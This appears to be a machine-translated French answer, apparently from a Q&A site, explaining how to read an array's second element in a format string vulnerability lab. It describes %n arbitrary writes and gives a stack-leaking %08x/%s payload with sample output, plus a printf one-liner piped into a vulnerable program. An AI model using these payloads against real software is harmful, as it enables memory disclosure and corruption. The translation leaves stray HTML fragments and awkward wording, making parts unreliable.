Accès au 2e élément d'un tableau dans une attaque de vulnérabilité de chaîne de format

L'astuce consiste à utiliser le spécificateur % n code> dans la chaîne de format spécifiée par l'utilisateur. % n code> dit de prendre le nombre d'octets écrits jusqu'à présent et les stocker à l'adresse pointée par l'argument suivant em>. Lorsque vous ne fournissez pas suffisamment d'arguments sur PrintF code>, l'adresse qu'elle écrit est quelle que soit la valeur suivante sur la pile. Si vous pouvez exploiter cette adresse pour être ce que vous voulez, vous pouvez essentiellement écrire un entier de 4 octets n'importe où dans la mémoire.

// Normal usage: count receives the value 14, since 14 bytes were written when
// the %n was encountered
int count;
printf("Hello, world!\n%n", &count);

// UNDEFINED BEHAVIOR: The value 14 will get written to some unknown location in
// memory 
printf("Hello, world!\n%n");

Pour accéder au secret [1], vous devez entrer l'adresse informatique comme entrée entière.

Please enter a decimal integer
73740
Please enter a string
%08x.%08x.%08x.%08x.%08x.%08x.%s
00008744.bead4ca4.bead4cc4.bead4dc4.00000001.000000a8.U

Vous pouvez réellement spécifier le décalage directement dans la chaîne de format.

EG. P>

$ printf "ADDRESS_IN_DECIMAL\n%%ADDRESS_OFFSET\$p_%%ADDRESS_OFFSET\$s\n" | ./vul_prog